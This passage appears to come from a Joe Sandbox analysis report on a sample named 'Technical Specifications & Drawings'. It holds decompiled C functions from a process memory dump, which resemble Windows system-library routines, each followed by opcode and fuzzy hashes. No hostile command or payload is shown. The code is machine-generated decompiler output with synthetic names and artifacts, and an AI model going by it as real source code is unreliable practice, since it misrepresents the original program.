                                                  				void* _v38;
                                                  				void* _v40;
                                                  				void* _v46;
                                                  				void* _v64;
                                                  				void* __ebx;
                                                  				intOrPtr* _t49;
                                                  				signed int _t53;
                                                  				short _t85;
                                                  				signed int _t87;
                                                  				signed int _t88;
                                                  				signed int _t89;
                                                  				intOrPtr _t101;
                                                  				intOrPtr* _t102;
                                                  				intOrPtr* _t104;
                                                  				signed int _t106;
                                                  				void* _t108;
                                                  
                                                  				_t93 = __ecx;
                                                  				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                  				_push(_t88);
                                                  				_v29 = __ecx;
                                                  				_t89 = _t88 | 0xffffffff;
                                                  				while(1) {
                                                  					E017BEEF0(0x18979a0);
                                                  					_t104 =  *0x1898210; // 0x1262c78
                                                  					if(_t104 == 0) {
                                                  						break;
                                                  					}
                                                  					asm("lock inc dword [esi]");
                                                  					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                  					E017BEB70(_t93, 0x18979a0);
                                                  					if( *((char*)(_t108 + 0xf)) != 0) {
                                                  						_t101 =  *0x7ffe02dc;
                                                  						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                  						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                  							L9:
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0x90028);
                                                  							_push(_t108 + 0x20);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push( *((intOrPtr*)(_t104 + 4)));
                                                  							_t53 = E017E9890();
                                                  							__eflags = _t53;
                                                  							if(_t53 >= 0) {
                                                  								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                  								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                  									E017BEEF0(0x18979a0);
                                                  									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                  									E017BEB70(0, 0x18979a0);
                                                  								}
                                                  								goto L3;
                                                  							}
                                                  							__eflags = _t53 - 0xc0000012;
                                                  							if(__eflags == 0) {
                                                  								L12:
                                                  								_t13 = _t104 + 0xc; // 0x1262c85
                                                  								_t93 = _t13;
                                                  								 *((char*)(_t108 + 0x12)) = 0;
                                                  								__eflags = E017DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                  								if(__eflags >= 0) {
                                                  									L15:
                                                  									_t102 = _v28;
                                                  									 *_t102 = 2;
                                                  									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                  									E017BEEF0(0x18979a0);
                                                  									__eflags =  *0x1898210 - _t104; // 0x1262c78
                                                  									if(__eflags == 0) {
                                                  										__eflags =  *((char*)(_t108 + 0xe));
                                                  										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                  										 *0x1898210 = _t102;
                                                  										_t32 = _t102 + 0xc; // 0x0
                                                  										 *_t95 =  *_t32;
                                                  										_t33 = _t102 + 0x10; // 0x0
                                                  										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                  										_t35 = _t102 + 4; // 0xffffffff
                                                  										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                  										if(__eflags != 0) {
                                                  											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                  											E01824888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                  										}
                                                  										E017BEB70(_t95, 0x18979a0);
                                                  										asm("lock xadd [esi], eax");
                                                  										if(__eflags == 0) {
                                                  											_push( *((intOrPtr*)(_t104 + 4)));
                                                  											E017E95D0();
                                                  											L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                  											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                  										}
                                                  										asm("lock xadd [esi], ebx");
                                                  										__eflags = _t89 == 1;
                                                  										if(_t89 == 1) {
                                                  											_push( *((intOrPtr*)(_t104 + 4)));
                                                  											E017E95D0();
                                                  											L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                  											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                  										}
                                                  										_t49 = _t102;
                                                  										L4:
                                                  										return _t49;
                                                  									}
                                                  									E017BEB70(_t93, 0x18979a0);
                                                  									asm("lock xadd [esi], eax");
                                                  									if(__eflags == 0) {
                                                  										_push( *((intOrPtr*)(_t104 + 4)));
                                                  										E017E95D0();
                                                  										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                  										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                  									}
                                                  									 *_t102 = 1;
                                                  									asm("lock xadd [edi], eax");
                                                  									if(__eflags == 0) {
                                                  										_t28 = _t102 + 4; // 0xffffffff
                                                  										_push( *_t28);
                                                  										E017E95D0();
                                                  										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                  									}
                                                  									continue;
                                                  								}
                                                  								_t93 =  &_v20;
                                                  								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                  								_t85 = 6;
                                                  								_v20 = _t85;
                                                  								_t87 = E017DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                  								__eflags = _t87;
                                                  								if(_t87 < 0) {
                                                  									goto L3;
                                                  								}
                                                  								 *((char*)(_t108 + 0xe)) = 1;
                                                  								goto L15;
                                                  							}
                                                  							__eflags = _t53 - 0xc000026e;
                                                  							if(__eflags != 0) {
                                                  								goto L3;
                                                  							}
                                                  							goto L12;
                                                  						}
                                                  						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                  						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                  							goto L3;
                                                  						} else {
                                                  							goto L9;
                                                  						}
                                                  					}
                                                  					L3:
                                                  					_t49 = _t104;
                                                  					goto L4;
                                                  				}
                                                  				_t49 = 0;
                                                  				goto L4;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1045956fa2dc1edb93cbcfe7815b3703f4cb51d3722992b3b125cf16de1a640b
                                                  • Instruction ID: 4f9da6dc2423e5e9c5a7ac1a692305fb74b29b3731084b5d3201eaa41171d65f
                                                  • Opcode Fuzzy Hash: 1045956fa2dc1edb93cbcfe7815b3703f4cb51d3722992b3b125cf16de1a640b
                                                  • Instruction Fuzzy Hash: D551EEB12093469BD722DF68C888B67FBE4FF94710F14091EF59587691EB74E900CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                  				signed short* _v8;
                                                  				signed short* _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr* _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				short _t56;
                                                  				signed int _t57;
                                                  				intOrPtr _t58;
                                                  				signed short* _t61;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t75;
                                                  				intOrPtr _t84;
                                                  				intOrPtr _t87;
                                                  				intOrPtr* _t90;
                                                  				signed short* _t91;
                                                  				signed int _t95;
                                                  				signed short* _t96;
                                                  				intOrPtr _t97;
                                                  				intOrPtr _t102;
                                                  				signed int _t108;
                                                  				intOrPtr _t110;
                                                  				signed int _t111;
                                                  				signed short* _t112;
                                                  				void* _t113;
                                                  				signed int _t116;
                                                  				signed short** _t119;
                                                  				short* _t120;
                                                  				signed int _t123;
                                                  				signed int _t124;
                                                  				void* _t125;
                                                  				intOrPtr _t127;
                                                  				signed int _t128;
                                                  
                                                  				_t90 = __ecx;
                                                  				_v16 = __edx;
                                                  				_t108 = _a4;
                                                  				_v28 = __ecx;
                                                  				_t4 = _t108 - 1; // -1
                                                  				if(_t4 > 0x13) {
                                                  					L15:
                                                  					_t56 = 0xc0000100;
                                                  					L16:
                                                  					return _t56;
                                                  				}
                                                  				_t57 = _t108 * 0x1c;
                                                  				_v32 = _t57;
                                                  				_t6 = _t57 + 0x1898204; // 0x0
                                                  				_t123 =  *_t6;
                                                  				_t7 = _t57 + 0x1898208; // 0x1898207
                                                  				_t8 = _t57 + 0x1898208; // 0x1898207
                                                  				_t119 = _t8;
                                                  				_v36 = _t123;
                                                  				_t110 = _t7 + _t123 * 8;
                                                  				_v24 = _t110;
                                                  				_t111 = _a4;
                                                  				if(_t119 >= _t110) {
                                                  					L12:
                                                  					if(_t123 != 3) {
                                                  						_t58 =  *0x1898450; // 0x0
                                                  						if(_t58 == 0) {
                                                  							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                  						}
                                                  					} else {
                                                  						_t26 = _t57 + 0x189821c; // 0x0
                                                  						_t58 =  *_t26;
                                                  					}
                                                  					 *_t90 = _t58;
                                                  					goto L15;
                                                  				} else {
                                                  					goto L2;
                                                  				}
                                                  				while(1) {
                                                  					_t116 =  *_t61 & 0x0000ffff;
                                                  					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                  					if(_t116 == _t128) {
                                                  						goto L18;
                                                  					}
                                                  					L5:
                                                  					if(_t116 >= 0x61) {
                                                  						if(_t116 > 0x7a) {
                                                  							_t97 =  *0x1896d5c; // 0x7f500654
                                                  							_t72 =  *0x1896d5c; // 0x7f500654
                                                  							_t75 =  *0x1896d5c; // 0x7f500654
                                                  							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                  						} else {
                                                  							_t116 = _t116 - 0x20;
                                                  						}
                                                  					}
                                                  					if(_t128 >= 0x61) {
                                                  						if(_t128 > 0x7a) {
                                                  							_t102 =  *0x1896d5c; // 0x7f500654
                                                  							_t84 =  *0x1896d5c; // 0x7f500654
                                                  							_t87 =  *0x1896d5c; // 0x7f500654
                                                  							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                  						} else {
                                                  							_t128 = _t128 - 0x20;
                                                  						}
                                                  					}
                                                  					if(_t116 == _t128) {
                                                  						_t61 = _v12;
                                                  						_t96 = _v8;
                                                  					} else {
                                                  						_t113 = _t116 - _t128;
                                                  						L9:
                                                  						_t111 = _a4;
                                                  						if(_t113 == 0) {
                                                  							_t115 =  &(( *_t119)[_t111 + 1]);
                                                  							_t33 =  &(_t119[1]); // 0x100
                                                  							_t120 = _a8;
                                                  							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                  							_t35 = _t95 - 1; // 0xff
                                                  							_t124 = _t35;
                                                  							if(_t120 == 0) {
                                                  								L27:
                                                  								 *_a16 = _t95;
                                                  								_t56 = 0xc0000023;
                                                  								goto L16;
                                                  							}
                                                  							if(_t124 >= _a12) {
                                                  								if(_a12 >= 1) {
                                                  									 *_t120 = 0;
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  							 *_a16 = _t124;
                                                  							_t125 = _t124 + _t124;
                                                  							E017EF3E0(_t120, _t115, _t125);
                                                  							_t56 = 0;
                                                  							 *((short*)(_t125 + _t120)) = 0;
                                                  							goto L16;
                                                  						}
                                                  						_t119 =  &(_t119[2]);
                                                  						if(_t119 < _v24) {
                                                  							L2:
                                                  							_t91 =  *_t119;
                                                  							_t61 = _t91;
                                                  							_v12 = _t61;
                                                  							_t112 =  &(_t61[_t111]);
                                                  							_v8 = _t112;
                                                  							if(_t61 >= _t112) {
                                                  								break;
                                                  							} else {
                                                  								_t127 = _v16 - _t91;
                                                  								_t96 = _t112;
                                                  								_v20 = _t127;
                                                  								_t116 =  *_t61 & 0x0000ffff;
                                                  								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                  								if(_t116 == _t128) {
                                                  									goto L18;
                                                  								}
                                                  								goto L5;
                                                  							}
                                                  						} else {
                                                  							_t90 = _v28;
                                                  							_t57 = _v32;
                                                  							_t123 = _v36;
                                                  							goto L12;
                                                  						}
                                                  					}
                                                  					L18:
                                                  					_t61 =  &(_t61[1]);
                                                  					_v12 = _t61;
                                                  					if(_t61 >= _t96) {
                                                  						break;
                                                  					}
                                                  					_t127 = _v20;
                                                  				}
                                                  				_t113 = 0;
                                                  				goto L9;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29b76b308e244fa6f328f6a84cdfc503620b944e24420dfad9c563ce70ec3f4f
                                                  • Instruction ID: 072e0bf58341be7685735ffe0cfb032548df484b3457555bf4c8b5399088beb8
                                                  • Opcode Fuzzy Hash: 29b76b308e244fa6f328f6a84cdfc503620b944e24420dfad9c563ce70ec3f4f
                                                  • Instruction Fuzzy Hash: E151A376B001198FCB18CF5CC4909BDF7B1FB89700719849AE856EB366E771AE52CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E0186AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed short* _t36;
                                                  				signed int _t41;
                                                  				char* _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t47;
                                                  				void* _t52;
                                                  				signed int _t57;
                                                  				intOrPtr _t61;
                                                  				signed char _t62;
                                                  				signed int _t72;
                                                  				signed char _t85;
                                                  				signed int _t88;
                                                  
                                                  				_t73 = __edx;
                                                  				_push(__ecx);
                                                  				_t85 = __ecx;
                                                  				_v8 = __edx;
                                                  				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                  				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                  				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                  					_t57 = _t57 | 0x00000001;
                                                  				}
                                                  				_t88 = 0;
                                                  				_t36 = 0;
                                                  				_t96 = _a12;
                                                  				if(_a12 == 0) {
                                                  					_t62 = _a8;
                                                  					__eflags = _t62;
                                                  					if(__eflags == 0) {
                                                  						goto L12;
                                                  					}
                                                  					_t52 = E0186C38B(_t85, _t73, _t57, 0);
                                                  					_t62 = _a8;
                                                  					 *_t62 = _t52;
                                                  					_t36 = 0;
                                                  					goto L11;
                                                  				} else {
                                                  					_t36 = E0186ACFD(_t85, _t73, _t96, _t57, _a8);
                                                  					if(0 == 0 || 0 == 0xffffffff) {
                                                  						_t72 = _t88;
                                                  					} else {
                                                  						_t72 =  *0x00000000 & 0x0000ffff;
                                                  					}
                                                  					 *_a12 = _t72;
                                                  					_t62 = _a8;
                                                  					L11:
                                                  					_t73 = _v8;
                                                  					L12:
                                                  					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                  						L19:
                                                  						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                  							L22:
                                                  							_t74 = _v8;
                                                  							__eflags = _v8;
                                                  							if(__eflags != 0) {
                                                  								L25:
                                                  								__eflags = _t88 - 2;
                                                  								if(_t88 != 2) {
                                                  									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                  									_t88 = E0186FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                  									goto L34;
                                                  								}
                                                  								L26:
                                                  								_t59 = _v8;
                                                  								E0186EA55(_t85, _v8, _t57);
                                                  								asm("sbb esi, esi");
                                                  								_t88 =  ~_t88;
                                                  								_t41 = E017C7D50();
                                                  								__eflags = _t41;
                                                  								if(_t41 == 0) {
                                                  									_t42 = 0x7ffe0380;
                                                  								} else {
                                                  									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  								}
                                                  								__eflags =  *_t42;
                                                  								if( *_t42 != 0) {
                                                  									_t43 =  *[fs:0x30];
                                                  									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                  									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                  										__eflags = _t88;
                                                  										if(_t88 != 0) {
                                                  											E01861608(_t85, _t59, 3);
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L34;
                                                  							}
                                                  							_push(_t62);
                                                  							_t47 = E01871536(0x1898ae4, (_t74 -  *0x1898b04 >> 0x14) + (_t74 -  *0x1898b04 >> 0x14), _t88, __eflags);
                                                  							__eflags = _t47;
                                                  							if(_t47 == 0) {
                                                  								goto L26;
                                                  							}
                                                  							_t74 = _v12;
                                                  							_t27 = _t47 - 1; // -1
                                                  							_t88 = _t27;
                                                  							goto L25;
                                                  						}
                                                  						_t62 = _t85;
                                                  						if(L0186C323(_t62, _v8, _t57) != 0xffffffff) {
                                                  							goto L22;
                                                  						}
                                                  						_push(_t62);
                                                  						_push(_t88);
                                                  						E0186A80D(_t85, 9, _v8, _t88);
                                                  						goto L34;
                                                  					} else {
                                                  						_t101 = _t36;
                                                  						if(_t36 != 0) {
                                                  							L16:
                                                  							if(_t36 == 0xffffffff) {
                                                  								goto L19;
                                                  							}
                                                  							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                  							if((_t62 & 0x0000000f) == 0) {
                                                  								goto L19;
                                                  							}
                                                  							_t62 = _t62 & 0xf;
                                                  							if(E0184CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                  								L34:
                                                  								return _t88;
                                                  							}
                                                  							goto L19;
                                                  						}
                                                  						_t62 = _t85;
                                                  						_t36 = E0186ACFD(_t62, _t73, _t101, _t57, _t62);
                                                  						if(_t36 == 0) {
                                                  							goto L19;
                                                  						}
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}




















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 862161faf589cbf82ba8d1e152db6e3852f401dc48c82c96179d8828bd4d36c8
                                                  • Instruction ID: afe3928f75832a4089f9805c87dfdb5ae59d7c125ac05de82901adb4dccb08d8
                                                  • Opcode Fuzzy Hash: 862161faf589cbf82ba8d1e152db6e3852f401dc48c82c96179d8828bd4d36c8
                                                  • Instruction Fuzzy Hash: FB41C4B17006159BD72EDA2DC894B3BB7DEAF94720F044219FA16E72D1DB34DA01C792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E017CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				char _v5;
                                                  				signed int _v12;
                                                  				signed int* _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v44;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed int _t54;
                                                  				char* _t58;
                                                  				signed int _t66;
                                                  				intOrPtr _t67;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				signed int* _t75;
                                                  				intOrPtr _t79;
                                                  				intOrPtr _t80;
                                                  				char _t82;
                                                  				signed int _t83;
                                                  				signed int _t84;
                                                  				signed int _t88;
                                                  				signed int _t89;
                                                  				intOrPtr _t90;
                                                  				intOrPtr _t92;
                                                  				signed int _t97;
                                                  				intOrPtr _t98;
                                                  				intOrPtr* _t99;
                                                  				signed int* _t101;
                                                  				signed int* _t102;
                                                  				intOrPtr* _t103;
                                                  				intOrPtr _t105;
                                                  				signed int _t106;
                                                  				void* _t118;
                                                  
                                                  				_t92 = __edx;
                                                  				_t75 = _a4;
                                                  				_t98 = __ecx;
                                                  				_v44 = __edx;
                                                  				_t106 = _t75[1];
                                                  				_v40 = __ecx;
                                                  				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                  					_t82 = 0;
                                                  				} else {
                                                  					_t82 = 1;
                                                  				}
                                                  				_v5 = _t82;
                                                  				_t6 = _t98 + 0xc8; // 0xc9
                                                  				_t101 = _t6;
                                                  				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                  				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                  				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                  				if(_t82 != 0) {
                                                  					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                  					_t83 =  *_t75;
                                                  					_t54 = _t75[1];
                                                  					 *_t101 = _t83;
                                                  					_t84 = _t83 | _t54;
                                                  					_t101[1] = _t54;
                                                  					if(_t84 == 0) {
                                                  						_t101[1] = _t101[1] & _t84;
                                                  						 *_t101 = 1;
                                                  					}
                                                  					goto L19;
                                                  				} else {
                                                  					if(_t101 == 0) {
                                                  						E017ACC50(E017A4510(0xc000000d));
                                                  						_t88 =  *_t101;
                                                  						_t97 = _t101[1];
                                                  						L15:
                                                  						_v12 = _t88;
                                                  						_t66 = _t88 -  *_t75;
                                                  						_t89 = _t97;
                                                  						asm("sbb ecx, [ebx+0x4]");
                                                  						_t118 = _t89 - _t97;
                                                  						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                  							_t66 = _t66 | 0xffffffff;
                                                  							_t89 = 0x7fffffff;
                                                  						}
                                                  						 *_t101 = _t66;
                                                  						_t101[1] = _t89;
                                                  						L19:
                                                  						if(E017C7D50() != 0) {
                                                  							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  						} else {
                                                  							_t58 = 0x7ffe0386;
                                                  						}
                                                  						_t102 = _v16;
                                                  						if( *_t58 != 0) {
                                                  							_t58 = E01878ED6(_t102, _t98);
                                                  						}
                                                  						_t76 = _v44;
                                                  						E017C2280(_t58, _v44);
                                                  						E017CDD82(_v44, _t102, _t98);
                                                  						E017CB944(_t102, _v5);
                                                  						return E017BFFB0(_t76, _t98, _t76);
                                                  					}
                                                  					_t99 = 0x7ffe03b0;
                                                  					do {
                                                  						_t103 = 0x7ffe0010;
                                                  						do {
                                                  							_t67 =  *0x1898628; // 0x0
                                                  							_v28 = _t67;
                                                  							_t68 =  *0x189862c; // 0x0
                                                  							_v32 = _t68;
                                                  							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                  							_v20 =  *_t99;
                                                  							while(1) {
                                                  								_t97 =  *0x7ffe000c;
                                                  								_t90 =  *0x7FFE0008;
                                                  								if(_t97 ==  *_t103) {
                                                  									goto L10;
                                                  								}
                                                  								asm("pause");
                                                  							}
                                                  							L10:
                                                  							_t79 = _v24;
                                                  							_t99 = 0x7ffe03b0;
                                                  							_v12 =  *0x7ffe03b0;
                                                  							_t72 =  *0x7FFE03B4;
                                                  							_t103 = 0x7ffe0010;
                                                  							_v36 = _t72;
                                                  						} while (_v20 != _v12 || _t79 != _t72);
                                                  						_t73 =  *0x1898628; // 0x0
                                                  						_t105 = _v28;
                                                  						_t80 =  *0x189862c; // 0x0
                                                  					} while (_t105 != _t73 || _v32 != _t80);
                                                  					_t98 = _v40;
                                                  					asm("sbb edx, [ebp-0x20]");
                                                  					_t88 = _t90 - _v12 - _t105;
                                                  					_t75 = _a4;
                                                  					asm("sbb edx, eax");
                                                  					_t31 = _t98 + 0xc8; // 0x186fb53
                                                  					_t101 = _t31;
                                                  					 *_t101 = _t88;
                                                  					_t101[1] = _t97;
                                                  					goto L15;
                                                  				}
                                                  			}










































                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1eb122cd8418cd981f758bda08521f7ad467b56153494f4f3c8a3788499d5a41
                                                  • Instruction ID: d1eedbc540fb84a4d0b8a0846dd92f08ccc45545698a23dc3e3bff014421481c
                                                  • Opcode Fuzzy Hash: 1eb122cd8418cd981f758bda08521f7ad467b56153494f4f3c8a3788499d5a41
                                                  • Instruction Fuzzy Hash: A9516D71E00606DFCB25CFA8C4806AEFBF5BB49710F24816ED955A7345EB70A984CBD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E017BEF40(intOrPtr __ecx) {
                                                  				char _v5;
                                                  				char _v6;
                                                  				char _v7;
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr _t58;
                                                  				char _t59;
                                                  				signed char _t69;
                                                  				void* _t73;
                                                  				signed int _t74;
                                                  				char _t79;
                                                  				signed char _t81;
                                                  				signed int _t85;
                                                  				signed int _t87;
                                                  				intOrPtr _t90;
                                                  				signed char* _t91;
                                                  				void* _t92;
                                                  				signed int _t94;
                                                  				void* _t96;
                                                  
                                                  				_t90 = __ecx;
                                                  				_v16 = __ecx;
                                                  				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                  					_t58 =  *((intOrPtr*)(__ecx));
                                                  					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                  						E017A9080(_t73, __ecx, __ecx, _t92);
                                                  					}
                                                  				}
                                                  				_t74 = 0;
                                                  				_t96 =  *0x7ffe036a - 1;
                                                  				_v12 = 0;
                                                  				_v7 = 0;
                                                  				if(_t96 > 0) {
                                                  					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                  					_v12 = _t74;
                                                  					_v7 = _t96 != 0;
                                                  				}
                                                  				_t79 = 0;
                                                  				_v8 = 0;
                                                  				_v5 = 0;
                                                  				while(1) {
                                                  					L4:
                                                  					_t59 = 1;
                                                  					L5:
                                                  					while(1) {
                                                  						if(_t59 == 0) {
                                                  							L12:
                                                  							_t21 = _t90 + 4; // 0x7746c21e
                                                  							_t87 =  *_t21;
                                                  							_v6 = 0;
                                                  							if(_t79 != 0) {
                                                  								if((_t87 & 0x00000002) != 0) {
                                                  									goto L19;
                                                  								}
                                                  								if((_t87 & 0x00000001) != 0) {
                                                  									_v6 = 1;
                                                  									_t74 = _t87 ^ 0x00000003;
                                                  								} else {
                                                  									_t51 = _t87 - 2; // -2
                                                  									_t74 = _t51;
                                                  								}
                                                  								goto L15;
                                                  							} else {
                                                  								if((_t87 & 0x00000001) != 0) {
                                                  									_v6 = 1;
                                                  									_t74 = _t87 ^ 0x00000001;
                                                  								} else {
                                                  									_t26 = _t87 - 4; // -4
                                                  									_t74 = _t26;
                                                  									if((_t74 & 0x00000002) == 0) {
                                                  										_t74 = _t74 - 2;
                                                  									}
                                                  								}
                                                  								L15:
                                                  								if(_t74 == _t87) {
                                                  									L19:
                                                  									E017A2D8A(_t74, _t90, _t87, _t90);
                                                  									_t74 = _v12;
                                                  									_v8 = 1;
                                                  									if(_v7 != 0 && _t74 > 0x64) {
                                                  										_t74 = _t74 - 1;
                                                  										_v12 = _t74;
                                                  									}
                                                  									_t79 = _v5;
                                                  									goto L4;
                                                  								}
                                                  								asm("lock cmpxchg [esi], ecx");
                                                  								if(_t87 != _t87) {
                                                  									_t74 = _v12;
                                                  									_t59 = 0;
                                                  									_t79 = _v5;
                                                  									continue;
                                                  								}
                                                  								if(_v6 != 0) {
                                                  									_t74 = _v12;
                                                  									L25:
                                                  									if(_v7 != 0) {
                                                  										if(_t74 < 0x7d0) {
                                                  											if(_v8 == 0) {
